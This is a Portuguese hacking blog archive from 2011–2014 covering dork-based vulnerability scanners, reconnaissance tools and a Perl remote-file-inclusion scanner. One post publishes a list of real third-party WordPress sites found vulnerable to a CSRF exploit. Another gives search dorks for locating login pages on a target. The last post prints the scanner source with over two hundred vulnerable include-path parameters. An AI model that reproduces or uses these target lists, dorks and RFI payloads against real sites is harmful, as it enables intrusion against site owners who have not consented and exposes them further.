Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

Mostrando postagens com marcador scanners. Mostrar todas as postagens
Mostrando postagens com marcador scanners. Mostrar todas as postagens

segunda-feira, 21 de julho de 2014

Testando novo Scanner inurl beta

BETA - Busca avançada em motores de busca, Possibilita desde analise com exploit GET/POST a captura de emails & validação personalizada interna para cada alvo/url encontrada.
#ZEND FRAMEWORK,#ERROS MYSQL,#ERROS MICROSOFT,#ERROS JDBC,#ERROS ORACLE,#ERROS POSTGRESQL,#ERROS PHP,#ERROS ASP,#ERROS LUA,#ERROS INDEFINIDOS

                                    _____
                                   (_____)  
                                   (() ()) 
                                    \   /   
                                     \ / 
                                     /=\
                                    [___]

#####################################
#GRUPO GOOGLEINURL BRASIL - PESQUISA AVANÇADA.
#SCRIPT NAME: INURLBR
#AUTOR:    Cleiton Pinheiro
#Nick:     Googleinurl
#Blog:     http://blog.inurl.com.br
#twitter: /@googleinurl
#facebook: /InurlBrasil
#Versão:  1.0
#-------------------------------------------------------------------------------
#PHP Version         5.4.7
#php5-curl           LIB
#php5-cli            LIB 
#cURL support        enabled
#cURL Information    7.24.0
#Apache              2.4
#allow_url_fopen     On
#permission          Reading & Writing
#User                root privilege, or is in the sudoers group
#Operating system    LINUX
#Proxy random        TOR               
#####################################

[YOUTUBE]
https://www.youtube.com/watch?v=_zpYVreCR_w

Testando novo Scanner inurl 1.0 beta

Testando novo Scanner inurl 1.0 beta


http://pastebin.com/Tb0Qp0qY

sexta-feira, 29 de novembro de 2013

Repositório oficial do SCANNER INURL

Repositório oficial do SCANNER INURL

Repositório oficial do SCANNER INURL.
Scanner INURL utiliza motor de busca Google para achar seus alvos.

O projeto SCANNER INURL com interface web será descontinuado.
Assim dando mais foco ao Scanner em linha de comando.

BUSCA POSSÍVEIS VULNERABILIDADES

SQLI(MySQL,MS ACCESS,Microsoft SQL Server,ORACLE,POSTGRESQL) OU ERROS DE PROGRAMAÇÃO.

OPÇÕES PARA SETAR PROXY.

MUDAR O MOTOR DE BUSCA GOOGLE 202 DISPONÍVEIS.

SETAR EXPLOIT.

PERSONALIZAR PROCURA DE ERROS DENTRO DE CADA URL ENCONTRADA.

GRUPO GOOGLEINURL BRASIL - PESQUISA AVANÇADA.

Repositório:
https://code.google.com/p/scanner-inurl/

sexta-feira, 22 de novembro de 2013

Usando SCANNER INURL para encontrar Vull's WP

EXPLOIT
Wordpress Amplus Theme - CSRF Vulnerability
Wordpress Amplus Theme - CSRF Vulnerability
RESULTADO
Usando SCANNER INURL Wordpress Amplus Theme - CSRF Vulnerability

BOT - SCANNER PRIV8 / - INURLBR

TOTAL DE URL's: 86

EXPLOIT USADO:

DORK: inurl:/themes/amplus/
ENCONTRAR: /amplus/scripts/
TOTAL DE POSSÍVEIS VULL: 37
ARQUIVO COM RESULTADO: resultados.txt

LISTA:


http://washingtonavenuecommons.com/wp-content/themes/amplus/scripts/prettyphoto/
http://washingtonavenuecommons.com/wp-content/themes/amplus/scripts/prettyphoto/images/prettyPhoto/
http://washingtonavenuecommons.com/wp-content/themes/amplus/scripts/prettyphoto/images/backgrounds/
http://telplus-inc.com/blog/wp-content/themes/amplus/scripts/
http://www.intuneautoworks.com/home/wp-content/themes/amplus/scripts/
http://www.intuneautoworks.com/home/wp-content/themes/amplus/scripts/syntaxhighlighter/
http://www.intuneautoworks.com/home/wp-content/themes/amplus/scripts/fonts/
www.intuneautoworks.com/home/wp.../
http://www.intuneautoworks.com/home/wp-content/themes/amplus/scripts/prettyphoto/
http://wnglaw.com/wp-content/themes/amplus/scripts/prettyphoto/
http://wnglaw.com/wp-content/themes/amplus/scripts/fonts/
http://wnglaw.com/wp-content/themes/amplus/scripts/syntaxhighlighter/
http://punc.psiada.org/wp-content/themes/amplus/scripts/syntaxhighlighter/scripts/
http://amaboston.org/wp-content/themes/amplus/scripts/syntaxhighlighter/styles/
http://www.avia-sys.com/wp-content/themes/amplus/scripts/syntaxhighlighter/scripts/
http://www.promisenaturalfoodsandbakery.com/wp-content/themes/amplus/scripts/prettyphoto/images/prettyPhoto/
http://light-eco-distribution.com/wp-content/themes/amplus/scripts/prettyphoto/js/
http://www.gettysburgfarmmarket.com/home/wp-content/themes/amplus/scripts/syntaxhighlighter/
http://www.gettysburgfarmmarket.com/home/wp-content/themes/amplus/scripts/prettyphoto/images/prettyPhoto/light_square/
http://www.dominiquediprima.com/wellness/wp-content/themes/amplus/scripts/fonts/
http://ringhello.co.uk/wp-content/themes/amplus/scripts/prettyphoto/
http://www.theglobalwarmingfoundation.org/wp-content/themes/amplus/scripts/syntaxhighlighter/styles/
www.theglobalwarmingfoundation.org/wp.../
http://www.kidzrchampions2.com/wp-content/themes/amplus/scripts/prettyphoto/images/thumbnails/
www.kidzrchampions2.com/wp.../
http://www.buc-holland.com/wp-content/themes/amplus/css/
http://training.dontsayno.in/wp-content/themes/amplus/amplus_v1.6/scripts/prettyphoto/
http://192.185.16.232/~wnglaw/wp-content/themes/amplus/scripts/prettyphoto/
http://192.185.16.232/~wnglaw/wp-content/themes/amplus/scripts/syntaxhighlighter/
http://192.185.16.232/~wnglaw/wp-content/themes/amplus/scripts/prettyphoto/css/
http://192.185.16.232/~wnglaw/wp-content/themes/amplus/scripts/prettyphoto/js/
http://www.laroccaallevamento.it/site/wp-content/themes/amplus/scripts/
http://www.laroccaallevamento.it/site/wp-content/themes/amplus/scripts/prettyphoto/js/
http://www.laroccaallevamento.it/site/wp-content/themes/amplus/scripts/prettyphoto/images/prettyPhoto/dark_square/
http://www.gambit.ph/themes/amplus
http://takeadriver.nl/wp-content/themes/amplus/scripts/syntaxhighlighter/scripts/
http://www.friendslookup.com/wp-content-themes-amplus-functions-timthumb


Exploit: http://www.exploit-db.com/exploits/29669/

segunda-feira, 28 de outubro de 2013

WhatWeb Scanner

WhatWeb 

WhatWeb é a próxima geração do scanner web.
WhatWeb  scanner

WhatWeb reconhece tecnologias web, incluindo sistemas de gerenciamento de conteúdo (CMS), plataformas de blogs, estatística / pacotes de análise, bibliotecas JavaScript, servidores web e dispositivos embarcados.

WhatWeb tem mais de 1000 plugins, cada um a reconhecer algo diferente. WhatWeb também identifica números de versão, endereços de e-mail, identificações de contas, módulos de frameworks web, erros de SQL, e muito mais.

WhatWeb pode ser furtivo e rápido, ou profundo, mas lento. WhatWeb suporta um nível de agressividade para controlar o trade off entre velocidade e confiabilidade. Quando você visita um site no seu navegador, a transação inclui muitas dicas do que tecnologias web estão alimentando o site. Às vezes, uma única visita página contém informações suficientes para identificar um site, mas quando isso não acontece, WhatWeb pode interrogar o site ainda mais. O nível padrão de agressão, chamado "passivo", é o único pedido HTTP de um site mais rápido e exige. Isso é adequado para a digitalização de sites públicos. Modos mais agressivas foram desenvolvidos para testes de penetração.


Baixar: http://whatweb.net/

WPSCAN scanner

WPScan
WPScan console

WPSCAN é um scanner feito em Ruby que busca possíveis vulnerabilidades em seus alvos com CMS Wordpress.

Este programa é software livre: você pode redistribuí-lo e / ou modificá-lo sob os termos da GNU General Public License conforme publicada pela Free Software Foundation, tanto a versão 3 da Licença, ou (a seu critério) qualquer versão posterior.

quinta-feira, 26 de setembro de 2013

SCANNER INURLBR 1.0 - PHP

SCANNER INURLBR 1.0
[ blog.inurl.com.br ]

    #############################################################
 *  SCANNER INURLBR     1.0
 *  PHP Version         5.4.7
 *  php5-curl           LIB
 *  cURL support enabled
 *  cURL Information 7.24.0
 *  Apache              2.4
 *  allow_url_fopen =   On
 *  Motor de busca      GOOGLE
 *  Permição            Leitura & Escrita 
 *  -------------------------------------------------------------------------------------
 *  BUSCA POSSÍVEIS VULNERABILIDADES
 *  SQLI(MySQL,MS ACCESS,Microsoft SQL Server,ORACLE,POSTGRESQL) OU ERROS DE PROGRAMAÇÃO.
 *  
 *  GRUPO GOOGLEINURL BRASIL - PESQUISA AVANÇADA.
 *  fb.com/GoogleINURL
 *  twitter.com/GoogleINURL
 *  blog.inurl.com.br
    #############################################################


SCANNER INURLBR     1.0

SCANNER INURLBR     1.0

SCANNER INURLBR     1.0

SCANNER INURLBR     1.0

SCANNER INURLBR     1.0


Baixar: http://pastebin.com/9tYBp5jK

domingo, 9 de dezembro de 2012

Procurando pagina de logins com dorks

Procurando pagina de logins com dorks
Muitas vezes não precisamos de programas sofisticados para achar forms de login.
Utilizando poder dork.
O que são DORK, a grosso modo são meios de pesquisa avançada em motores de busca, que tem o intuito de explorar seus alvos de acordo com a necessidade do atacante.
Pode ser usado para procurar SQLI,RFI,LFI, Arquivo sensíveis e etc...
No momento este post vai dar uma ajuda em achar forms de login.

Alvo:www.siteteste1.com.br
Dork 01: site:.siteteste1.com.br +login
Dork 02: site:.siteteste1.com.br +senha
Dork 03: site:.siteteste1.com.br +admin
..... etc assim vai.

sexta-feira, 30 de novembro de 2012

theHarvester: O coletor de informação!





Apresento a vocês hoje uma ferramenta chama the Harvester, o coletor, em português. Quem usa alguma distribuição linux dedicada ao pentest (Backtrack, Bugtraq) já deve ter visto ou usado esse script. O objetivo desse programa escrito em Python é colher e-mails, subdominios, hosts, nomes de empregados, portas abertas e aplicações utilizadas no servidor alvo em diferentes fontes de pesquisa como: Google, Bing, servidores de chaves PGP e bancos de dados Shodan.

Essa ferramenta ajuda os pentesters a entender os footprints dos alvos, e, por consequencia, ajuda os Engenheiros Sociais.

Forma de uso:

$ python theHarvester.py -d seusite.com.br -l 50 -b google

$ python theHarvester.py --help

Explicação:
-d = Define o alvo
-l = Limite de resultados que o motor de pesquisa deve retornar
-b = Motor de pesquisa
--help ou -h = Imprime na tela a ajuda do programa, mostrando outras formas de uso.

Exemplo de resultado:


*************************************
*TheHarvester Ver. 2.2                                  *
*Coded by Christian Martorella                      *
*Edge-Security Research                                *
*[email protected]                    *
*************************************

[-] Searching in Google:
Searching 0 results...
[+] Emails found:
------------------
*****@vivo.com.br
*****@vivo.com.br
*****@vivo.com.br
[+] Hosts found in search engines:
------------------------------------
123.154.88.000:ficticio.vivo.com.br
123.456.789.1:blablabla.vivo.com.br
000.000.00.0:meuvivolalala.vivo.com.br

Site oficial: www.edge-security.com/theharvester.php
Download: code.google.com/p/theharvester

Os dados são ficticios.

Fica a dica e usem com responsabilidade.

Abraços,

Equipe INURL.

segunda-feira, 19 de novembro de 2012

Script para listagem de diretórios em Python




                                 

Este script é escrito em Python. Ele scaneia webservers à procura de diretórios comuns, administrativos e shells em php. O script é bem fácil de ser usado.

Via Terminal entre na pasta onde você extraiu o arquivo e digite (como root):
# python scanner.py

Logo depois vai aparecer a imagem que está nesse post ali em cima.

Logo depois digite a URL desejada. É importante lembrar que precisa especificar se é http ou https, caso o contrário o script não vai funcionar.


Exemplo do menu do script:


Os logs ficam na pasta /logs/.

Esse script foi testado utilizando proxychains no Ubuntu 12.10.

Para download, clique aqui.

Bons estudos!

domingo, 2 de setembro de 2012

Programa Dork Scanner Ver 2.0

Dork Scanner Ver 2.0
Feito em C#
Efetua suas busca por ums 4 tipos de Bot.
Já é composto por 3 arquivos txt já com dorks de pesquisa editáveis RFI,PHP,ASP

Programa Dork Scanner Ver 2.0
Programa feito por: p0!z0neR

Baixar: http://optimusolucoes.com.br/Scanner-Dorks-2.0.rar

sexta-feira, 31 de agosto de 2012

Uniscan vulneráveis sql-injection

Uniscan vulneráveis sql-injection


Uniscan
###############################
# Uniscan project #
# http://www.uniscan.com.br/ #
###############################
V. 3.0

-h help
-u example: https://www.example.com/
-f with list of url's
-T default: 15
-v number of a page, default: 2
-t of a connection in seconds, default: 10
-r of the crawler, default: 15000
-s of one request in bytes, default: 1048576 [1MB]
-o default: Vuls.txt
-b Uniscan go to background
-p example: www.example.com
-l example: 8080
Option -u or -f is required, all others no.

usage:
[1] perl uniscan.pl -u http://www.example.com/
[2] perl uniscan.pl -f /home/user/file.txt
[3] perl uniscan.pl -u https://www.example.com/
[4] perl uniscan.pl -u http://www.example.com/ -T 30 -t 20 -r 1000 -s 524288 -o vulnerables.txt
[5] perl uniscan.pl -f /home/user/file.txt -T 30 -t 20 -r 1000 -s 524288 -o vulnerables.txt -b
[6] perl uniscan.pl -u https://www.example.com/ -T 20 -t 20 -r 200 -b -p 192.168.1.5 -l 8001


Sem segredo.

http://sourceforge.net/projects/uniscan/


Scanner Bot - ERROR - SQL [FastBot]

Scanner Bot - ERROR - SQL [FastBot]
Scritp perl

Criar o arquivo onde fica suas dork's
Suas dorks = input.txt
Onde sera salvo os link vulneráveis  = output_injection.txt

Perl fastbot.pl

Scanner Bot - ERROR - SQL [FastBot]


Sera salva suas vul.

Link baixar:http://pastebin.com/feiuNhX5

segunda-feira, 27 de agosto de 2012

Script Para Scanner maquinas VNC vulneráveis.

Scanner feito em PERL Voltado para IRC
Scanner feito em PERL Voltado para IRC

# IRC Scanner - VNC VULN SCAN
 # by Nexen && CrashOveriDe
 # Multi-threaded scan for OpenVNC 4.11 authentication bypass.
 # Based on Tyler Krpata's Perl scanning code.


quinta-feira, 2 de agosto de 2012

Nova ferramenta á caminho InurlBrasil 1.0

InurlBrasil 1.0


Estou fazendo uma ferramenta para os estudiosos das Dorks & SQL injection.

Programa InurlBrasil, Software de pesquisa URL através de dork , afim de testar segurança web "Sql - injection".
Feito em C#

Estou fazendo uma ferramenta para os estudiosos das Dorks & SQL injection.
Estou fazendo uma ferramenta para os estudiosos das Dorks & SQL injection.
Estou fazendo uma ferramenta para os estudiosos das Dorks & SQL injection.

sexta-feira, 30 de março de 2012

Scanner de ip simples para fins de estudo

Scanner de ip simples para fins de estudo

Feito em C#.

Code..:






using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Windows.Forms;
using System.Net;
using System.Net.NetworkInformation;
using System.Globalization;


namespace Scanner
{
    public partial class Form1 : Form
    {
        public Form1()
        {
            InitializeComponent();
        }


        public IPAddress ip;
        public PingReply pr;
        public string ip1;
        public Ping ping;
        private void backgroundWorker1_DoWork(object sender, DoWorkEventArgs e)
        {


            for (int i = Convert.ToInt32(txtStart.Text); i <= Convert.ToInt32(txtEnd.Text); i++)
            {
                try
                {
                    if (backgroundWorker1.CancellationPending == true)
                    {
                        e.Cancel = true;
                        break;
                    }
                    else
                    {


                        ip1 = (txtIp.Text + "." + i.ToString());
                        ip = IPAddress.Parse(ip1);


                        ping = new Ping();
                        pr = ping.Send(ip, 5);
                        backgroundWorker1.ReportProgress(i);
                    }
                }
                catch
                {


                }


            }
        }
        private void backgroundWorker1_ProgressChanged(object sender, ProgressChangedEventArgs e)
        {
            if (pr.Status.ToString() == "Success")
            {
                resultsListView.Items.Add(ip1);
            }


            try { this.progressBar1.Value = e.ProgressPercentage; }
            catch { this.progressBar1.Maximum += 1; }
        }
        private void btStart_Click(object sender, EventArgs e)
        {
            progressBar1.Value = 0;
            progressBar1.Maximum = Convert.ToInt32(txtEnd.Text);
            backgroundWorker1.RunWorkerAsync();


        }
        private void btCancelar_Click(object sender, EventArgs e)
        {
            if (backgroundWorker1.WorkerSupportsCancellation == true)
            {


                backgroundWorker1.CancelAsync();
            }
        }
        private void backgroundWorker1_RunWorkerCompleted(object sender, RunWorkerCompletedEventArgs e)
        {
            MessageBox.Show("Scanner Terminou!");
        }
    }
}








Ferramentas Visual Studio:  http://www.microsoft.com/visualstudio/11/pt-br/downloads


Baixar Código fonte:  http://Baixar/Scanner.rar


Baixar Programa: http://Baixar/Scanner_exe.rar
Necessário para rodar .NET Framework 3.5 

segunda-feira, 26 de março de 2012

Vanguard – Ferramenta para Testes de Intrusão Web, em Perl

Vanguard – Ferramenta para Testes de Intrusão Web, em Perl

Vanguard é uma ferramenta para testes de intrusão web desenvolvida em Perl que trás algumas features pra galera que já trabalha na área. Vejam só:
  • Fully Configurable
  • WebCrawlers crawl all open HTTP and HTTPS ports output from nmap
  • LibWhisker2 For HTTP IDS Evasion (Same options as nikto)
  • Tests via GET,POST, and COOKIE
“Teste de segurança” em aplicações Web que esta ferramenta se propõem a executar:
  • SQL injection (This test is signature free!)
  • LDAP Injection
  • XSS
  • File inclusion
  • Command Injection
Ela não tem nada de novo ou inovador. É só mais uma ferramenta que você pode utilizar dentro do seu cinto de utilidades hacker. Importante, siga os passos logo abaixo quanto a instalação do módulos de pré-req Perl que a ferramenta precisa:
  1. Install perl – apt-get install perl
  2. Install Net::SSLeay Library – perl -e shell -MCPAN
    CPAN> install Net::SSLeay
  3. Install Clone and YAML Library of Perl – apt-get install libconfig-yaml-perl libclone-perl
O Vanguard da ferramenta poderá ser feito a partir do seguinte link.
http://www.blackhatacademy.org/releases/vanguard-public.tgz

Fonte: http://blog.corujadeti.com.br  Recomento blog muito bom.

quinta-feira, 22 de março de 2012

SiteDigger 3.0 procurar por vulnerabilidades, erros,problemas de configuração



SiteDigger 3,0 procura cache do Google para procurar por vulnerabilidades, erros,problemas de configuração, informações proprietárias e interessante pepitas de segurança em sites da web.

O que há de novo no SiteDigger 3,0
Interface de usuário melhorada, atualização de assinatura ea página de resultados.
Já não exige licença do Google API Key.
Suporte para Proxy e TOR.
Fornece resultados em tempo real.
Resultado configurável definido.
Atualizado assinaturas.
Capacidade para salvar a seleção assinatura e conjunto de resultados.
Como usar SiteDigger
Selecione as assinaturas da árvore
Fornecer a chave de licença na caixa inferior direito do mouse sobre a ferramenta.
Digite o domínio / sub-domínio da informação.
Aperte o botão Scan.
Salve as assinaturas e os resultados para análise futura.

Requisitos de Sistema
Microsoft. NET Framework v3.5 


Baixar http://downloadcenter.mcafee.com/products/tools/foundstone/sitedigger3.msi

domingo, 14 de agosto de 2011

Scritp [Perl] RFI Scanner.

Scanner [Perl] RFI Scanner

 

#!/usr/bin/perl
#Scan a host for rfi vulnerability
# by priv8, senk0 version
use HTTP::Request;
use LWP::UserAgent;

&inizio;
sub inizio{
print q(
  ###########################
   Rfi vulnerability scanner
   by nobody, senk0 version
  ###########################
);
print "\n Insert host:(ex: http://www.site.com/)\n";
$host=;
chomp($host);
print "Ok lets scan..\n";
$rfi1="includes/header.php?systempath=";
$rfi2="Gallery/displayCategory.php?basepath=";
$rfi3="index.inc.php?PATH_Includes=";
$rfi4="nphp/nphpd.php?nphp_config[LangFile]=";
$rfi5="include/db.php?GLOBALS[rootdp]=";
$rfi6="ashnews.php?pathtoashnews=";
$rfi7="ashheadlines.php?pathtoashnews=";
$rfi8="modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=";
$rfi9="demo/includes/init.php?user_inc=";
$rfi10="jaf/index.php?show=";
$rfi11="inc/shows.inc.php?cutepath=";
$rfi12="poll/admin/common.inc.php?base_path=";
$rfi13="pollvote/pollvote.php?pollname=";
$rfi14="sources/post.php?fil_config=";
$rfi15="modules/My_eGallery/public/displayCategory.php?basepath=";
$rfi16="bb_lib/checkdb.inc.php?libpach=";
$rfi17="include/livre_include.php?no_connect=lol&chem_absolu=";
$rfi18="index.php?from_market=Y&pageurl=";
$rfi19="modules/mod_mainmenu.php?mosConfig_absolute_path=";
$rfi20="pivot/modules/module_db.php?pivot_path=";
$rfi21="modules/4nAlbum/public/displayCategory.php?basepath=";
$rfi22="derniers_commentaires.php?rep=";
$rfi23="modules/coppermine/themes/default/theme.php?THEME_DIR=";
$rfi24="modules/coppermine/include/init.inc.php?CPG_M_DIR=";
$rfi25="modules/coppermine/themes/coppercop/theme.php?THEME_DIR=";
$rfi26="coppermine/themes/maze/theme.php?THEME_DIR=";
$rfi28="allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=";
$rfi29="allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=";
$rfi30="myPHPCalendar/admin.php?cal_dir=";
$rfi31="agendax/addevent.inc.php?agendax_path=";
$rfi32="modules/mod_mainmenu.php?mosConfig_absolute_path=";
$rfi33="modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=";
$rfi34="main.php?page=";
$rfi35="default.php?page=";
$rfi36="index.php?action=";
$rfi37="index1.php?p=";
$rfi38="index2.php?x=";
$rfi39="index2.php?content=";
$rfi40="index.php?conteudo=";
$rfi41="index.php?cat=";
$rfi42="include/new-visitor.inc.php?lvc_include_dir=";
$rfi43="modules/agendax/addevent.inc.php?agendax_path=";
$rfi44="shoutbox/expanded.php?conf=";
$rfi45="modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=";
$rfi46="pivot/modules/module_db.php?pivot_path=";
$rfi47="library/editor/editor.php?root=";
$rfi48="library/lib.php?root=";
$rfi49="e107/e107_handlers/secure_img_render.php?p=";
$rfi50="zentrack/index.php?configFile=";
$rfi51="main.php?x=";
$rfi52="becommunity/community/index.php?pageurl=";
$rfi53="GradeMap/index.php?page=";
$rfi54="phpopenchat/contrib/yabbse/poc.php?sourcedir=";
$rfi55="calendar/calendar.php?serverPath=";
$rfi56="calendar/functions/popup.php?serverPath=";
$rfi57="calendar/events/header.inc.php?serverPath=";
$rfi58="calendar/events/datePicker.php?serverPath=";
$rfi59="calendar/setup/setupSQL.php?serverPath=";
$rfi60="calendar/setup/header.inc.php?serverPath=";
$rfi61="mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=";
$rfi62="zentrack/index.php?configFile=";
$rfi63="pivot/modules/module_db.php?pivot_path=";
$rfi64="inc/header.php/step_one.php?server_inc=";
$rfi65="install/index.php?lng=../../include/main.inc&G_PATH=";
$rfi66="inc/pipe.php?HCL_path=";
$rfi67="include/write.php?dir=";
$rfi68="include/new-visitor.inc.php?lvc_include_dir=";
$rfi69="includes/header.php?systempath=";
$rfi70="support/mailling/maillist/inc/initdb.php?absolute_path=";
$rfi71="coppercop/theme.php?THEME_DIR=";
$rfi72="zentrack/index.php?configFile=";
$rfi73="pivot/modules/module_db.php?pivot_path=";
$rfi74="inc/header.php/step_one.php?server_inc=";
$rfi75="install/index.php?lng=../../include/main.inc&G_PATH=";
$rfi76="inc/pipe.php?HCL_path=";
$rfi77="include/write.php?dir=";
$rfi78="include/new-visitor.inc.php?lvc_include_dir=";
$rfi79="includes/header.php?systempath=";
$rfi80="support/mailling/maillist/inc/initdb.php?absolute_path=";
$rfi81="coppercop/theme.php?THEME_DIR=";
$rfi82="becommunity/community/index.php?pageurl=";
$rfi83="shoutbox/expanded.php?conf=";
$rfi84="agendax/addevent.inc.php?agendax_path=";
$rfi85="myPHPCalendar/admin.php?cal_dir=";
$rfi86="yabbse/Sources/Packages.php?sourcedir=";
$rfi87="dotproject/modules/projects/addedit.php?root_dir=";
$rfi88="dotproject/modules/projects/view.php?root_dir=";
$rfi89="dotproject/modules/projects/vw_files.php?root_dir=";
$rfi90="dotproject/modules/tasks/addedit.php?root_dir=";
$rfi91="dotproject/modules/tasks/viewgantt.php?root_dir=";
$rfi92="My_eGallery/public/displayCategory.php?basepath=";
$rfi93="modules/My_eGallery/public/displayCategory.php?basepath=";
$rfi94="modules/4nAlbum/public/displayCategory.php?basepath=";
$rfi95="modules/coppermine/themes/default/theme.php?THEME_DIR=";
$rfi96="modules/agendax/addevent.inc.php?agendax_path=";
$rfi97="modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=";
$rfi98="modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=";
$rfi99="modules/coppermine/include/init.inc.php?CPG_M_DIR=";
$rfi100="modules/mod_mainmenu.php?mosConfig_absolute_path=";
$rfi101="shoutbox/expanded.php?conf=";
$rfi102="pivot/modules/module_db.php?pivot_path=";
$rfi103="library/editor/editor.php?root=";
$rfi104="library/lib.php?root=";
$rfi105="e107/e107_handlers/secure_img_render.php?p=";
$rfi106="main.php?x=";
$rfi107="main.php?page=";
$rfi108="index.php?meio.php=";
$rfi109="index.php?include=";
$rfi110="index.php?inc=";
$rfi111="index.php?page=";
$rfi112="index.php?pag=";
$rfi113="index.php?p=";
$rfi114="index.php?x=";
$rfi115="index.php?open=";
$rfi116="index.php?visualizar=";
$rfi117="index.php?pagina=";
$rfi118="index2.php?content=";
$rfi119="inc/step_one_tables.php?server_inc=";
$rfi120="GradeMap/index.php?page=";
$rfi121="phpshop/index.php?base_dir=";
$rfi122="admin.php?cal_dir=";
$rfi123="contacts.php?cal_dir=";
$rfi124="convert-date.php?cal_dir=";
$rfi125="album_portal.php?phpbb_root_path=";
$rfi126="mainfile.php?MAIN_PATH=";
$rfi127="dotproject/modules/files/index_table.php?root_dir=";
$rfi128="html/affich.php?base=";
$rfi129="gallery/init.php?HTTP_POST_VARS=";
$rfi130="pm/lib.inc.php?pm_path=";
$rfi131="ideabox/include.php?gorumDir=";
$rfi132="index2.php?includes_dir=";
$rfi133="forums/toplist.php?phpbb_root_path=";
$rfi134="forum/toplist.php?phpbb_root_path=";
$rfi135="admin/config_settings.tpl.php?include_path=";
$rfi136="include/common.php?include_path=";
$rfi137="event/index.php?page=";
$rfi138="forum/index.php?includeFooter=";
$rfi139="forums/index.php?includeFooter=";
$rfi140="forum/bb_admin.php?includeFooter=";
$rfi141="forums/bb_admin.php?includeFooter=";
$rfi142="language/lang_english/lang_activity.php?phpbb_root_path=";
$rfi143="forum/language/lang_english/lang_activity.php?phpbb_root_path=";
$rfi144="blend_data/blend_common.php?phpbb_root_path=";
$rfi145="master.php?root_path=";
$rfi146="includes/kb_constants.php?module_root_path=";
$rfi147="forum/includes/kb_constants.php?module_root_path=";
$rfi148="forums/includes/kb_constants.php?module_root_path=";
$rfi149="classes/adodbt/sql.php?classes_dir=";
$rfi150="agenda.php3?rootagenda=";
$rfi151="agenda2.php3?rootagenda=";
$rfi152="sources/lostpw.php?CONFIG[path]=";
$rfi153="topsites/sources/lostpw.php?CONFIG[path]=";
$rfi154="toplist/sources/lostpw.php?CONFIG[path]=";
$rfi155="sources/join.php?CONFIG[path]=";
$rfi156="topsites/sources/join.php?CONFIG[path]=";
$rfi157="toplist/sources/join.php?CONFIG[path]=";
$rfi158="topsite/sources/join.php?CONFIG[path]=";
$rfi159="public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=";
$rfi160="extras/poll/poll.php?file_newsportal=";
$rfi161="index.php?site_path=";
$rfi162="mail/index.php?site_path=";
$rfi163="fclick/show.php?path=";
$rfi164="show.php?path=";
$rfi165="calogic/reconfig.php?GLOBALS[CLPath]=";
$rfi166="eshow.php?Config_rootdir=";
$rfi167="auction/auction_common.php?phpbb_root_path=";
$rfi168="index.php?inc_dir=";
$rfi169="calendar/index.php?inc_dir=";
$rfi170="modules/TotalCalendar/index.php?inc_dir=";
$rfi171="modules/calendar/index.php?inc_dir=";
$rfi172="calendar/embed/day.php?path=";
$rfi173="ACalendar/embed/day.php?path=";
$rfi174="calendar/add_event.php?inc_dir=";
$rfi175="claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=";
$rfi176="claroline/auth/ldap/authldap.php?includePath=";
$rfi177="docebo/modules/credits/help.php?lang=";
$rfi178="modules/credits/help.php?lang=";
$rfi179="config.php?returnpath=";
$rfi180="editsite.php?returnpath=";
$rfi181="in.php?returnpath=";
$rfi182="addsite.php?returnpath=";
$rfi183="includes/pafiledb_constants.php?module_root_path=";
$rfi184="phpBB/includes/pafiledb_constants.php?module_root_path=";
$rfi185="pafiledb/includes/pafiledb_constants.php?module_root_path=";
$rfi186="auth/auth.php?phpbb_root_path=";
$rfi187="auth/auth_phpbb/phpbb_root_path=";
$rfi188="apc-aa/cron.php3?GLOBALS[AA_INC_PATH]=";
$rfi189="apc-aa/cached.php3?GLOBALS[AA_INC_PATH]=";
$rfi190="infusions/last_seen_users_panel/last_seen_users_panel.php?settings[locale]=";
$rfi191="phpdig/includes/config.php?relative_script_path=";
$rfi192="includes/phpdig/includes/config.php?relative_script_path=";
$rfi193="includes/dbal.php?eqdkp_root_path=";
$rfi194="eqdkp/includes/dbal.php?eqdkp_root_path=";
$rfi195="dkp/includes/dbal.php?eqdkp_root_path=";
$rfi196="include/SQuery/gameSpy2.php?libpath=";
$rfi197="include/global.php?GLOBALS[includeBit]=";
$rfi198="topsites/config.php?returnpath=";
$rfi199="manager/frontinc/prepend.php?_PX_config[manager_path]=";
$rfi200="ubbthreads/addpost_newpoll.php?addpoll=thispath=";
$rfi201="forum/addpost_newpoll.php?thispath=";
$rfi202="forums/addpost_newpoll.php?thispath=";
$rfi203="ubbthreads/ubbt.inc.php?thispath=";
$rfi204="forums/ubbt.inc.php?thispath=";
$rfi205="forum/ubbt.inc.php?thispath=";
$rfi206="forum/admin/addentry.php?phpbb_root_path=";
$rfi207="admin/addentry.php?phpbb_root_path=";
$rfi208="index.php?f=";
$rfi209="index.php?act=";
$rfi210="ipchat.php?root_path=";
$rfi211="includes/orderSuccess.inc.php?glob[rootDir]=";
$rfi212="stats.php?dir[func]=dir[base]=";
$rfi213="ladder/stats.php?dir[base]=";
$rfi214="ladders/stats.php?dir[base]=";
$rfi215="sphider/admin/configset.php?settings_dir=";
$rfi216="admin/configset.php?settings_dir=";
$rfi217="vwar/admin/admin.php?vwar_root=";
$rfi218="modules/vwar/admin/admin.php?vwar_root=";
$rfi219="modules/vWar_Account/includes/get_header.php?vwar_root=";
$rfi220="modules/vWar_Account/includes/functions_common.php?vwar_root2=";
$rfi221="sphider/admin/configset.php?settings_dir=";
$rfi222="admin/configset.php?settings_dir=";
$rfi223="impex/ImpExData.php?systempath=";
$rfi224="forum/impex/ImpExData.php?systempath=";
$rfi225="forums/impex/ImpExData.php?systempath=";
$rfi226="application.php?base_path=";
$rfi227="index.php?theme_path=";
$rfi228="become_editor.php?theme_path=";
$rfi229="add.php?theme_path=";
$rfi230="bad_link.php?theme_path=";
$rfi231="browse.php?theme_path=";
$rfi232="detail.php?theme_path=";
$rfi233="fav.php?theme_path=";
$rfi234="get_rated.php?theme_path=";
$rfi235="login.php?theme_path=";
$rfi236="mailing_list.php?theme_path=";
$rfi237="new.php?theme_path=";
$rfi238="modify.php?theme_path=";
